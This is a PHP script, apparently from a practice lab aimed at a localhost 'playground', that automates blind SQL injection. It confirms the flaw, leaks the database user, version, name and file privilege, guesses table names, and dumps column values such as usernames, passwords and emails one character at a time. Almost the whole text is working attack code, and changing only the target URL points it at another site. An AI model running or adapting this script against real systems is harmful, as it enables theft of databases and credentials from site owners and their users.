<?php$url = "http://localhost/playground/sqli/blind/blind.php?comment=1";

1. <?php
2.  
3. $url   = "http://localhost/playground/sqli/blind/blind.php?comment=1";
4.  
5. $tables = [
6.      "table_user",
7.      "table_content",
8.      "table_comment",
9.      "table_users",
10.      "table_member",
11.      "table_admin",
12.      "table_halaman"
13. ];
14. $columns = [
15.      "uname",
16.      "user",
17.      "name",
18.      "username",
19.      "password",
20.      "email",
21.      "id",
22.      "comment",
23.      "judul",
24.      "content"
25. ];
26. $datas = ["+",","];
27. $datas = array_merge($datas,range("~","-"));
28. sort($datas);
29.  
30. //list of query
31. $query1 = array("+and+false","+and+true");
32. $query2 = array("user()","version()","database()","(SELECT+file_priv+FROM+mysql.user+LIMIT+0,1)");
33.  
34. //test for sql injection
35. $req1 = file_get_contents($url . $query1[0]);
36. $req2 = file_get_contents($url . $query1[1]);
37. if($req1 !== $req2){
38.      echo "\n[+] probably, it's possible to blind sql injection\n";
39. }else{
40.      die("\n[-] we're not sure that it's possible to blind sql injection\n");
41. }
42.  
43. //checking version,user,and database name
44. echo "[+] we're looking for common information of it's database\n";
45. foreach($query2 as $x){
46.      if($x == "(SELECT+file_priv+FROM+mysql.user+LIMIT+0,1)"){
47.           echo "\n[*] FILE_PRIV\t: ";
48.      }else{
49.           $zz = strtoupper(str_replace("()","",$x));
50.           echo "\n[*] {$zz}\t: ";
51.      }
52.      for($itung = 1; $itung <= 20; $itung++):
53.           foreach($datas as $z){
54.                $query = "+and+BINARY+substring({$x},{$itung},1)='{$z}'";
55.                $req   = file_get_contents($url . $query);
56.                if($req === $req2):
57.                     echo $z;
58.                     break;
59.                endif;
60.           }
61.           sleep(0.30);
62.      endfor;
63. }
64. echo "\n\n";
65.  
66. $table_found = array();
67. echo "[+] we are looking for table name\n\n";
68. foreach($tables as $x){
69.      $query = "+and+(SELECT+1+FROM+{$x}+LIMIT+0,1)=1";
70.      $req   = file_get_contents($url . $query);
71.      if($req === $req2):
72.           echo "[*] {$x}\n";
73.           $table_found[] = $x;
74.      endif;
75. }
76. echo "\n";
77.  
78. echo "[+] dumping the whole of datas of all the tables\n\n";
79. foreach($table_found as $x){
80.      echo "[+] from table {$x}\n\n";
81.      foreach($columns as $z){
82.           $query = "+AND+(SELECT+SUBSTRING(CONCAT(1,{$z}),1,1)+FROM+{$x}+LIMIT+0,1)=1";
83.           $req   = file_get_contents($url . $query);
84.           if($req === $req2):
85.                echo "[*] {$z}\t : ";
86.                for($xx = 1;$xx <= 100; $xx++):
87.                     foreach($datas as $zz){
88.                          $query1 = "+and+BINARY+substring((SELECT+group_concat({$z})+FROM+{$x}),{$xx},1)='{$zz}'";
89.                          $req    = file_get_contents($url . $query1);
90.                          if($req === $req2):
91.                               if($zz === "+"):
92.                                    $zz = " ";
93.                               endif;
94.                               echo $zz;
95.                               break;
96.                          endif;
97.                     }
98.                endfor;
99.                echo "\n";
100.           endif;
101.      }
102.      echo "\n";
103. }
104.  
105. ?>